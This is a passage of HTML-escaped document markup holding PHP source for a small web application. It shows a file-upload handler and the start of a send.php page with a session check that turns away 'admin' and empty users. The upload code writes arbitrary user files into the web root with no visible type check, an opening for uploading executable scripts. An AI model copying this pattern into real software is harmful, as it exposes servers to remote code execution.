New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$uploadfile &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;/var/www/html/uploads/&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;generateRS();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; (&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;move_uploaded_file&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'tmp_name'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;], $uploadfile))&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$fname &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_FILES[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'file'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;][&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'name'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;addfile($fname, $uploadfile);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;error2&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;add();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:700;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;send.php&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.38;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;font-weight:normal;&quot;&gt;&lt;br /&gt;&lt;/b&gt;&lt;/p&gt;&lt;div dir=&quot;ltr&quot; style=&quot;margin-left:0pt;&quot;&gt;&lt;table style=&quot;border:none;border-collapse:collapse;width:468pt&quot;&gt;&lt;colgroup&gt;&lt;col width=&quot;*&quot;&gt;&lt;/colgroup&gt;&lt;tbody&gt;&lt;tr style=&quot;height:0pt&quot;&gt;&lt;td style=&quot;border-left:solid #000000 1pt;border-right:solid #000000 1pt;border-bottom:solid #000000 1pt;border-top:solid #000000 1pt;vertical-align:top;padding:5pt 5pt 5pt 5pt;&quot;&gt;&lt;p dir=&quot;ltr&quot; style=&quot;line-height:1.7999999999999998;margin-top:0pt;margin-bottom:0pt;&quot;&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;if&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;ISSET&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;]) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;||&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;===&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;admin&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;||&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $_SESSION[&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;'user'&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;] &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;===&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;die&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;Nope!&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;require&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;models.php&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span 